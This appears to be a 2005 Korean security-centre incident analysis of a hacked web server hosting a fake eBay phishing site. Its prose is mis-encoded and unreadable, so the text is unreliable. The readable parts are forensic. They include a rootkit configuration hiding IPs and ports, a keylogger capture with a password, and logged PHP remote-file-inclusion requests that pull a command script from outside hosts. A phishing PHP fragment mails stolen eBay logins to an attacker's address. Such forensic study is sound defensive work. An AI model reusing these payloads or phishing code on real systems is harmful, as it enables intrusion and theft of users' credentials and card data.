Home | Data Center | Contact US | Login

Á¦¸ñ Çǽ̻çÀÌÆ® ¾Ç¿ë¼­¹ö ºÐ¼® »ç·Ê
÷ºÎÆÄÀÏ 050302_phising_note.pdf ÀÛ¼ºÀÏ 2005-04-19 14:49:53
Çǽ̻çÀÌÆ®¾Ç¿ë¼­¹öºÐ¼®»ç·Ê  2005. 3. 2
ÀÎÅͳÝħÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ(KISC)

1. »ç°í °³¿ä

05³â 2¿ù ÇؿܷκÎÅÍ ±¹³» A»ç ȨÆäÀÌÁö ¼­¹ö¿¡ ¹Ì±¹ ebay»çÀÇÀ§Àå ÆäÀÌÁö°¡ ¼­ºñ½º µÇ°í ÀÖ´Ù´Â Å뺸¸¦ ¹Þ°í ÇØ´ç »çÀÌÆ®¿¡ ´ëÇÑ È®ÀÎÀÛ¾÷¿¡ µé¾î°¬´Ù.

(±×¸² 1) A»ç¿¡ ¼³Ä¡µÈ ebay À§Àå ÆäÀÌÁö

ÀÌ »çÀÌÆ®´Â ½Å°íÁ¢¼öµÈ ½Ã°£¿¡µµ Çǽ̰ü·Ã ÆäÀÌÁö°¡ ¿­·ÁÁ® ÀÖ´Â »óÅ¿´À¸¸ç, ¾Æ·¡¿Í °°ÀÌ 4z1z3"¶ó´Â µð·ºÅ丮¸¦ »õ·Î ¸¸µé¾î Çǽ̰ü·Ã ÆäÀÌÁö¸¦ ¸¸µé¾î ³õ¾Ò¾ú´Ù.



ÇÏÁö¸¸, °ø°ÝÀÚ°¡ ȨÆäÀÌÁö ÃʱâÈ­¸éÀ» º¯Á¶ÇÏ´Â µîÀÇ ÇàÀ§¸¦ ÇÏÁö¾Ê°í 4z1z3"¿Í °°Àº µð·ºÅ丮¸¦ ¸¸µé¾î Çǽ̿¡ ÀÌ¿ëÇÏ°í ÀÖ¾î ȨÆäÀÌÁö °ü¸®ÀÚ°¡ ÇØ´ç »ç½ÇÀ» ÀÎÁöÇϱâ Èûµé¾ú´Ù.

2. ÇÇÇØ ÇöȲ ¹× °ø°Ý ¿øÀÎ ºÐ¼®

ÇÇÇؽýºÅÛ ´ã´çÀÚ¿Í ¿¬¶ôÀ» ÃëÇÑ °á°ú, °ü¸®ÀÚ°¡ ºÐ¼®ÀÇ·Ú ¿äûÇÔ¿¡µû¶ó ºÐ¼®À» ½ÃÀÛÇÏ¿´´Ù.
ÇÇÇؽýºÅÛÀº IDC¿¡ ÀÔÁÖÇØ ÀÖ¾úÀ¸¸ç, ¼­¹ö È£½ºÆà ¾÷üÀÇ ¼­¹ö¸¦ÀÓ´ëÇÏ¿© »ç¿ëÇÏ°í ÀÖ¾ú°í, ÇØ´ç ¼­¹ö¸¦ ȨÆäÀÌÁö ¼­¹ö·Î »ç¿ëÇÏ°í ÀÖ¾ú´Ù.
ÇöÀå µµÂø ½Ã, ÇØ´ç ½Ã½ºÅÛÀº ÇØÅ·À¸·Î ÀÎÇÑ ¾Ç¼º Æ®·¡ÇÈ ¹ß»ý°¡´É¼ºÀ¸·Î ÀÎÇØ È£½ºÆà ¾÷ü¿¡¼­ ³×Æ®¿öÅ© ÄÉÀ̺íÀ» ºÐ¸®ÇÑ »óÅ¿´À¸¹Ç·Î, ÄÜ¼Ö »ó¿¡¼­ »ç°í ºÐ¼®À» ÁøÇàÇÏ¿´´Ù.

ÇÇÇØ ½Ã½ºÅÛÀº Linux 7.1, Apache 1.3.19, PHP 4.3.1 ȯ°æÀ» »ç¿ëÇÏ°í ÀÖ¾úÀ¸¸ç, »ç¿ë ÁßÀÎ À¥ °Ô½ÃÆÇÀÌ Á¦·Îº¸µå(Zeroboard) 4.1 pl4¿´´Ù . Á¦·Îº¸µå´Â Ãë¾àÇÑ ¹öÀüÀ̾úÀ¸¸ç, php.iniÀÇ ¼³Á¤ ¶ÇÇÑ"allow_url_fopen=On", "register_globals=On"À¸·Î ¼³Á¤µÇ¾î ÀÖ¾î ¿ÜºÎÀÇ °ø°ÝÀÌ °¡´ÉÇÑ »óÅ¿´´Ù ÃÖ±Ù PHP ȯ°æ¼³Á¤ ¿À·ù ¹× Á¦·Îº¸µåÀǺ¸¾È Ãë¾àÁ¡À¸·Î ÀÎÇÑ À¥ º¯Á¶ »ç°í°¡ ´ë±Ô¸ð·Î ¹ß»ýµÇ¾î ÀÌ Ãë¾àÁ¡À¸·Î ÀÎÇÑ °ø°ÝÀ» ¿ì¼± ÀǽÉÇÏ¿´´Ù.

/var/log µð·ºÅ丮 Àüü°¡ »èÁ¦µÈ »óÅ¿´À¸¸ç, À̴ ȨÆäÀÌÁöu54644 .Å·µî ÀϹÝÀûÀÎ ÇØÅ·¿¡¼­´Â ½±°Ô º¼ ¼ö ¾ø´Â °ÍÀ¸·Î °ø°ÝÀÚ°¡ ÀÚ½ÅÀÇ ÇàÀ§¸¦ ¼û±â±â À§ÇÑ ÇàÀ§·Î ÆǴܵȴÙ.

¶ÇÇÑ, ½ÇÁ¦ ÇØ´ç ÇÇÇØ ½Ã½ºÅÛ¿¡´Â »ç°í°¡ Á¢¼öµÈ 2¿ù ÀÌÀü¿¡ ¸¹Àº °ø°Ý°ü·Ã ÆÄÀϵé°ú ·çƮŶÀÌ ¼³Ä¡µÇ¾î ÀÖ¾î ´Ù¼öÀÇ °ø°ÝÀÚ¿¡ ÀÇÇØ À̹̰ø°ÝÀ» ¹ÞÀº °ÍÀ¸·Î ÃßÁ¤µÈ´Ù.

´ÙÀ½Àº ÇØ´ç ½Ã½ºÅÛ¿¡¼­ ¹ß°ßÇÑ °ø°ÝÀÚÀÇ °ø°ÝÇàÀ§¿Í ÇÇÇØ ÇöȲµéÀÌ´Ù.

¡à ·çƮŶ, ½º´ÏÆÛ µî ¾Ç¼º ÇÁ·Î±×·¥ ¼³Ä¡
01³â 3¿ù ÀÌÈĺÎÅÍ ´Ù¼öÀÇ µð·ºÅ丮¿¡¼­ ¾Ç¼º ÇÁ·Î±×·¥ÀÌ ¹ß°ßµÇ¾úÀ¸¸ç, ½Ã½ºÅÛ ÆÄÀϵ鵵 »ó´ç¼ö º¯Á¶µÈ »óÅ¿´´Ù.
¸ÕÀú, 01³â 3¿ù 15ÀÏ /usr/lib/libsh¿¡ ½º´ÏÆÛ ÇÁ·Î±×·¥(shsniff)¿Í ·Î±× »èÁ¦ ÇÁ·Î±×·¥(hide), ±×¸®°í ½ºÄ³´× µµ±¸ µîÀÌ ¼³Ä¡µÇ¾ú´Ù.

[root@t4linux libsh]# ls -alct
total 36
-rw-r--r-- 1 root root 2000 Mar 15 2001 hide
-rw-r--r-- 1 root root 1345 Mar 15 2001 shsb
drwxr-xr-x 2 root root 4096 Feb 24 19:11 utilz
drwxr-xr-x 2 root root 4096 Feb 24 19:11 .sniff
drwxr-xr-x 2 root root 4096 Feb 24 19:11 .owned
drwxr-xr-x 2 root root 4096 Feb 24 19:11 .backup
drwxr-xr-x 4 root root 4096 Feb 24 19:11 ..
[root@t4linux libsh]#

05³â 1¿ù 26ÀÏ¿¡´Â /usr/include ¾Æ·¡¿¡ ·çƮŶÀÇ È¯°æ¼³Á¤ ÆÄÀÏÀ̹߰ߵǾúÀ¸¸ç, ÀÌ ÆÄÀÏÀÌ »ý¼ºµÈ ³¯Â¥¿¡ ls, ps µî ÁÖ¿ä ÆÄÀϵ鵵 º¯Á¶µÇ¾î ÀÖ¾ú´Ù ÀϹÝÀûÀ¸·Î /usr/include´Â ÇìµåÆÄÀÏ(*.h)ÀÌ ÀúÀåµÇ´Â °÷À¸·Î ¿©±â¿¡ file.h, hosts.h¿Í °°ÀÌ Á¤»óÀûÀÎ ÇìµåÆÄÀÏ·Î À§ÀåÇÏ¿© ·çÆ®
ŶÀ» À§ÇÑ ¼³Á¤ÆÄÀÏÀ» ¸¸µé¾î ³õ°í ÀÖ¾ú´Ù.

´ÙÀ½Àº ·çƮŶ ȯ°æ¼³Á¤ÆÄÀÏÀÇ ³»¿ëÀ¸·Î½á, À̸¦ ÅëÇØ ¿ªÀ¸·Î °ø°ÝÇÁ·Î±×·¥µéÀ̳ª °ø°ÝÀÚ¸¦ ÃßÁ¤ÇÒ ¼ö ÀÖ´Ù.

ÆÄÀÏ¸í ³»¿ë ÆÄÀÏ¸í ³»¿ë
file.h sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
hosts.h 2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 61690
4 61690
log.h mirkforce
synscan
syslog
proc.h 3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload

hosts.h ÆÄÀÏ¿¡ ƯÁ¤ IP ºí·Ï°ú Æ÷Æ®µéÀÌ º¸À̴µ¥, IP ºí·Ï(À¯·´Áö¿ªIP ºí·ÏÀÓ)Àº °ø°ÝÀÚÀÇ IPÀÏ °¡´É¼ºÀÌ ³ôÀ¸¸ç, Æ÷Æ®¹øÈ£´Â ¹éµµ¾î Æ÷Æ®³ª °ø°ÝÀ» À§ÇØ »ç¿ëµÇ´Â Æ÷Æ®·Î ÃßÁ¤µÈ´Ù °ø°ÝÀÚ´Â IRC¿¡ »ç¿ëµÇ´Â6667 Æ÷Æ®µµ ¼û±â°íÀÚ ÇÏ¿´´Ù.

2005³â 2¿ù 9ÀÏ¿¡´Â ÇÇ½Ì °ü·Ã ÆÄÀϵéÀÌ ¼³Ä¡µÈ µð·ºÅ丮 À̸§(.4z1z4)°ú µ¿ÀÏÇÑ µð·ºÅ丮 /dev µð·ºÅ丮 ³»¿¡ »ý¼ºµÇ¾î ÀÖ¾ú´Ù.  /dev µð·ºÅ丮´Â À¯´Ð½º ½Ã½ºÅÛ¿¡¼­ ÀåÄ¡ÆÄÀϵéÀÌ ÀÖ´Â °÷À̳ª, °ü¸®ÀÚ°¡ °ü½ÉÀ» °¡Áö°í º¸Áö ¾Ê´Â Á¡À» ÀÌ¿ëÇÏ¿© °ø°ÝÀÚµéÀÌ °ø°Ýµµ±¸³ª °ø°Ý °á°ú¹°µéÀ» ¼û°Ü³õ´Â Àå¼Ò·Î ¸¹ÀÌ ÀÌ¿ëµÇ°í ÀÖ´Ù .
/dev/.4z1z4 µð·ºÅ丮¿¡´Â ½Ã½ºÅÛ¿¡¼­ ¹ß»ýµÇ´Â ¸ðµç Å° ÀԷ°ªÀÌ ÀúÀåµÇµµ·Ï ÇÏ´Â ÇÁ·Î±×
·¥°ú ±× °á°ú°¡ ÀúÀåµÈ ÆÄÀÏ(.sniffer)ÀÌ ¹ß°ßµÇ¾ú´Ù.
´ÙÀ½Àº snifferÀÇ ³»¿ë ÀϺηνá DB »ç¿ëÀÚµéÀÇ Æнº¿öµå°¡ ³ëÃâµÇ¾î ÀÖ¾úÀ¸¸ç, °ø°ÝÀÚ°¡ ´Ù¸¥ ½Ã½ºÅÛÀ» °ø°ÝÇÏ´Â °úÁ¤µµ ÀúÀåµÇ¾î ÀÖ¾ú´Ù
 
./mysqldump -u root -p mysql :
Enter password: xxxxxxxxxx -> DB ¾ÏÈ£°¡ ³ëÃâµÊ
./mysqldump -u lee -p lee :
Enter password: xxxxxx -> DB ¾ÏÈ£°¡ ³ëÃâµÊ
...
chattr -i /bin/ps
/usr/sbin/sshd -R :
./login -h xxx.xxx.xxx.218 : -> ÇØÅ·ÇÑ ¶Ç ´Ù¸¥ ¼­¹ö·ÎÀÇ Á¢¼ÓÀ» ÇÏ´Â ³»¿ëÀÌ ÀúÀåµÊ
/dev/null
Listening to port 35214
password: m2o3a4z5
/usr/sbin/sshd -R :
..
 
¡à Á¦·Îº¸µå °Ô½ÃÆÇÀ» ÀÌ¿ëÇÑ ÇØÅ· ÈçÀû
2005³â 2¿ù 14ÀÏ ÇÇÇØ ½Ã½ºÅÛ¿¡¼­ ¿î¿µ ÁßÀÎ 3°³ÀÇ µµ¸ÞÀο¡¼­ »ç¿ëÁßÀÎ Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý½Ãµµ°¡ À¥ access_log¸¦ ÅëÇØÈ®ÀεǾú´Ù.

200.103.32.152 - - [14/Feb/2005:08:26:06 +0900] "GET /bbs//include/write.php?
dir=http://www.xxx.com.br/contador/cmd?&cmd=id HTTP/1.0" 200 0
219.116.94.139 - - [14/Feb/2005:09:54:38 +0900] "GET
http://xxx.xxx.xxx.kr/bbs//include/write.php?
dir=http://www.xxx.ubbi.com.br/cmd.txt?&cmd=ver HTTP/1.0" 200 0

°ø°ÝÀÚ´Â 2¿ù 14ÀÏ°æ ºê¶óÁú(200.103.32.152)°ú ÀϺ»(219.116.94.139)À¸·ÎºÎÅÍ PHP Injection °ø°ÝÀ» ½ÃµµÇÏ¿© À¥¼­¹öÀÇ »ç¿ëÀÚ °èÁ¤ µîÀ» È®ÀÎÇÏ¿´´Ù. ·Î±×¿¡ ³²Àº ±â·ÏÀ¸·Î´Â ½ÇÁ¦ °ø°ÝÀÌ °¡´ÉÇÑ »óÅ¿´À½À» È®ÀÎÇÒ ¼ö ÀÖ¾úÀ¸³ª ÇØ´ç ·Î±×ÆÄÀÏ¿¡¼­ ½Ã½ºÅÛ Ä§ÀÔ µî Ãß°¡ÀûÀÎ °ø°ÝÇàÀ§¿¡ ´ëÇؼ­´Â È®ÀÎÇÒ ¼ö ¾ø¾ú´Ù.

3. ÇÇ½Ì °ü·Ã ºÐ¼®

¡à ÇÇ½Ì °ü·Ã ÆÄÀÏ ºÐ¼®
ÇÇÇؽýºÅÛ¿¡´Â ¹Ì±¹ÀÇ ÀüÀÚ»ó°Å·¡ »çÀÌÆ®ÀÎ ebayÀÇ À§Àå »çÀÌÆ®°¡ ±¸ÃàµÇ¾î ÀÖ¾úÀ¸¸ç, ÀϹÝÀûÀÎ ÇÇ½Ì »ç·Ê¿Í ¸¶Âù°¡Áö·Î ½ºÆÔ ¸ÞÀÏ ¹ß¼ÛµîÀ» ÅëÇØ À§Àå ÆäÀÌÁöÀÇ Á¢¼ÓÀ» À¯µµÇÑ °ÍÀ¸·Î ¿¹»óµÈ´Ù.
 
[root@t4linux ebay]# ls -alct
total 168
drwxr-xr-x 2 root root 4096 Feb 24 19:11 1_files
drwxr-xr-x 3 root root 4096 Feb 24 16:51 .
-rw-r--r-- 1 root root 960 Feb 16 16:52 ebay2.php
-rw-r--r-- 1 root root 12686 Feb 16 16:53
http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_contine_verify_admin
_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrbay1.htm
<Áß°£ »ý·«>
-rw-r--r-- 1 root root 14331 Feb 16 16:53
http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_contine_verify_admin
_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrbay7.htm
-rw-r--r-- 1 root root 585 Feb 16 16:54 login1.php
-rw-r--r-- 1 root root 148 Feb 16 16:52 period_ani.gif
-rw-r--r-- 1 root root 195 Feb 16 16:52 1.php
-rw-r--r-- 1 root root 1088 Feb 16 16:52 ebay1.php
drwxr-xr-x 3 root root 4096 Feb 16 16:52 ..
[root@t4linux ebay]#

ÀÌ À§Àå ÆäÀÌÁöµéÀÌ °í°´ Á¤º¸¸¦ »©³»´Â °úÁ¤Àº ´ÙÀ½°ú °°¾Ò´Ù.

¨ç ÃÖÃÊ Á¢¼Ó ½Ã, ebay »çÀÌÆ®ÀÇ ¾ÆÀ̵ð¿Í ¾ÏÈ£¸¦ ÀÔ·ÂÇÏ´Â ·Î±ä ÆäÀÌÁö¿¡ Á¢¼Ó
¨è ÀÌ ÆäÀÌÁö¿¡¼­ ½ÇÁ¦ Á¸ÀçÇÏ´Â ¾ÆÀ̵ð, ¾ÏÈ£¸¦ ¸Â°Ô ÀÔ·ÂÇÏ¿´´õ¶óµµ ÀÔ·ÂÀÌ Æ²·È´Ù´Â ¸Þ½ÃÁö°¡ ±âÀçµÈ µÎ ¹ø° ÆäÀÌÁö·Î ¿¬°áµÇ¾î ÀçÂ÷ ¾ÆÀ̵ð¿Í ¾ÏÈ£¸¦ ÀÔ·ÂÇϵµ·Ï À¯µµÇÔ
¨é µÎ ¹ø° ÆäÀÌÁö¿¡¼­ ÀÔ·ÂµÈ ¾ÆÀ̵ð¿Í ¾ÏÈ£´Â ƯÁ¤ À¥¸ÞÀÏ ÁÖ¼Ò(idyearbayids@yahoo.com)·Î ¹ß¼Û µÇ¸ç ÀÚµ¿À¸·Î ¼¼ ¹ø° ÆäÀÌÁö·Î ¿¬°áµÊ

$ip = getenv("REMOTE_ADDR");
$mail1='midyearbayids@yahoo.com';
$subject="eb|aylog|in !";
<Áß°£ »ý·«>
if ($result==1)
mail($mail1,$subject,$mailbody);
<Áß°£ »ý·«>
?>

¨ê ¼¼ ¹ø° ÆäÀÌÁö¿¡¼­´Â °³ÀÎÁ¤º¸¸¦ ÀÔ·ÂÇÏ´Â ÆäÀÌÁö·Î¼­ Ä«µå¹øÈ£ ¹× ¹Ì±¹ÀÇ »çȸº¸Àå¹øÈ£(Social Security Number)µîÀÇ Á¤º¸¸¦ ÀÔ·ÂÇϵµ·Ï µÇ¾î ÀÖÀ¸¸ç, ÀÔ·ÂµÈ Ä«µå¹øÈ£¸¦ È®ÀÎÇÑ´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ°í °úÁ¤ °ø°ÝÀÚ ¸ÞÀÏÁÖ¼Ò·Î ÀÔ·ÂµÈ ³»¿ëÀ» ¹ß¼ÛÇÑ ÈÄ ³× ¹ø° ÆäÀÌÁö·Î ¿¬°áµÊ
¨ë ³× ¹ø° ÆäÀÌÁö¿¡¼­´Â ÀÔ·ÂµÈ ÀºÇàÁ¤º¸°¡ À߸øµÇ¾ú´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ¸ç, Ä«µå¹øÈ£¿Í ÀºÇà°èÁ¹øÈ£µîÀÇ Á¤º¸¸¦ ÀÔ·ÂÇÏ´Â ³»¿ëÀÌ ±âÀçµÇ¾î ÀÖÀ½ ÀÔ·Â ¿Ï·á½Ã ¿ª½Ã °ø°ÝÀÚ ¸ÞÀÏÁÖ¼Ò·Î ÀԷ³»¿ëÀ» ¹ß¼ÛÇÑ ÈÄ ¸¶Áö¸· ÆäÀÌÁö·Î ¿¬°áµÊ
¨ì ¸¶Áö¸· ÆäÀÌÁö¿¡¼­´Â ÀÔ·ÂµÈ ³»¿ëÀÌ Àß È®ÀεǾú´Ù´Â ¸Þ½ÃÁö¿Í ÇÔ²² ÀÎÅÍ³Ý ÀͽºÇ÷ξî Á¾·á¸¦ ¹¯´Â È®ÀÎâÀÌ ¿­¸²

¿©±â¿¡¼­ À§Àå »çÀÌÆ®ÀÇ °ø°ÝÀÚ ¸ÞÀÏ ÁÖ¼Ò¸¦ º¯°æÇÑ ÈÄ Ä«µå¹øÈ£ µîÀ» ÀÔ·ÂÇÑ °á°ú ¾Æ·¡¿Í °°Àº °í°´ Á¤º¸°¡ ¸ÞÀÏ ÁÖ¼Ò·Î ¼ö½ÅµÇ´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.


¡à ÇÇ½Ì °ü·Ã ·Î±× ºÐ¼®
2005³â 2¿ù 13ÀÏ, Çǽ̰ü·Ã ÆäÀÌÁö¿¡ ´ëÇÑ Á¢¼Ó ½ÇÆÐ ±â·ÏÀÌ ³²¾Æ ÀÖ¾ú´Ù.

[Sun Feb 13 13:30:20 2005] [error] [client 69.31.82.10] Directory index
forbidden by rule: /home/kypp/public_html/.4z1z4/
[Sun Feb 13 13:30:30 2005] [error] [client 69.31.82.10] Directory index
forbidden by rule: /home/kypp/public_html/.4z1z4/.ssl/html/ebay/
[Sun Feb 13 13:36:31 2005] [error] [client 209.247.193.180] Directory index
forbidden by rule: /home/kypp/public_html/.4z1z4/.ssl/html/ebay/1_files/

±×¸®°í, 05³â 2¿ù 14ÀÏ »õº®°æºÎÅÍ À¥ ·Î±×(access_log)¿¡ ebay·Î À§ÀåµÈ ÆäÀÌÁö¿¡ ´ëÇÑ Á¢¼Ó ¼º°ø ±â·ÏÀÌ ´Ù¼ö ³²¾Æ ÀÖ¾ú´Ù.
 
66.135.207.155 - - [14/Feb/2005:04:26:27 +0900] "GET
/.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con
tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba
y4.htm HTTP/1.1" 200 36471
66.77.136.213 - - [14/Feb/2005:05:38:26 +0900] "GET
/.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con
tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba
y6.htm HTTP/1.0" 200 20713
168.143.113.112 - - [14/Feb/2005:11:24:52 +0900] "GET
/.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con
tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba
y4.htm HTTP/1.1" 200 36471
.....

À̶§ºÎÅÍ ÇÇ½Ì ¸ÞÀÏÀ» ¼ö½ÅÇÑ »ç¿ëÀÚµéÀÌ Å¬¸¯ÇÏ¿© ÇØ´ç ÆäÀÌÁö¸¦ º»°ÍÀ¸·Î º¸À̸ç, ÇØ¿ÜÀÇ 7°³ Á¤µµÀÇ IP°¡ Á¢¼ÓÇÏ¿´´Ù.
ÇÏÁö¸¸, ½ÇÁ¦ À§Àå ÆäÀÌÁö¿¡¼­ °³ÀÎ Á¤º¸¸¦ ÀÔ·ÂÇÏ°í °ø°ÝÀÚ¿¡°Ô ¸ÞÀÏÀÌ ¹ß¼ÛµÇ¾ú´ÂÁö¸¦ È®ÀÎÇϱâ À§ÇØ syslog¸¦ È®ÀÎÇÏ¿´À¸³ª midyearbayids@yahoo.com ·ÎÀÇ ¸ÞÀÏ¹ß¼Û ³»¿ªÀº º¼ ¼ö ¾ø¾ú´Ù.

4. °á·Ð

ÇÇÇØ ½Ã½ºÅÛÀº ÀÌ¹Ì ¿À·¡ ÀüºÎÅÍ ¿©·¯ ¹ø¿¡ °ÉÃÄ ´Ù¼öÀÇ ÇØÄ¿°¡ ÇØÅ·À» ÇÏ¿´À¸¸ç, ls, ps µî ÁÖ¿ä ½Ã½ºÅÛ ÆÄÀÏÀÌ º¯°æµÇ°í, ½º´ÏÇÎ ÇÁ·Î±×·¥ÀÌ ¼³Ä¡µÇ´Â µî ±¤¹üÀ§ÇÑ ÇÇÇظ¦ ÀÔ¾ú´Ù ÃÖ±Ù¿¡´Â À¥ º¯Á¶ »ç°Ç¿¡¼­ÈçÈ÷ º¼ ¼ö ÀÖ´Â Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý(PHP Injection)µµ ÀÖ¾ú´Ù.

ÇÏÁö¸¸, ÀÌ·¯ÇÑ °ø°Ý¿¡ ÀÇÇØ À§Àå ebay »çÀÌÆ®°¡ »ý¼ºµÇ¾ú´Ù´Â ·Î±×´Â ãÀ» ¼ö ¾ø¾ú´Ù ¶ÇÇÑ ÀϹÝÀûÀÎ ÇØÅ·»ç°í¿¡¼­ º¸±â µå¹°°Ô ·Î±× µð·ºÅ丮(/var/log) Àüü¸¦ »èÁ¦ÇÏ¿© ÃßÀûÀ» ÇÇÇÏ°íÀÚ ÇÏ¿´´Ù.

º» »ç°í¿¡¼­ ÇÇ½Ì À§Àå »çÀÌÆ®ÀÇ °ø°Ý ¹æ¹ý°ú °ø°ÝÀÚ¸¦ ÃßÀûÇÏ°íÀÚÇÏ¿´À¸³ª Á÷Á¢ÀûÀÎ ´Ü¼­¸¦ ãÀ» ¼ö ¾ø¾î ¾Æ½¬¿ü´Ù ±×·¯³ª ÃÖ±Ù ±¹³»´Ù¼öÀÇ À¥¼­¹öµéÀÌ °¡Áö°í ÀÖ´Â PHP °ü·Ã Ãë¾àÁ¡ÀÌ ´Ü¼ø ÃʱâÈ­¸é º¯Á¶¿¡ ÀÌ¿ëµÉ »Ó¸¸ ¾Æ´Ï¶ó Çǽ̰ú °°Àº ¹üÁË¿¡µµ ÀÌ¿ëµÉ ¼ö ÀÖ´Ù´Â °¡´É¼ºÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.

[Ãâó - Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø]
  ¾Ç¼º Botnet ¸í·É/Á¦¾î ¼­¹ö »ç°í ºÐ¼®
  ¾Ç¼º ÇÁ·Î±×·¥ À¯Æ÷·Î ÀÌ¿ëµÈ ±¹³»»ç°í½Ã½ºÅÛ ºÐ¼®





ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ
ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ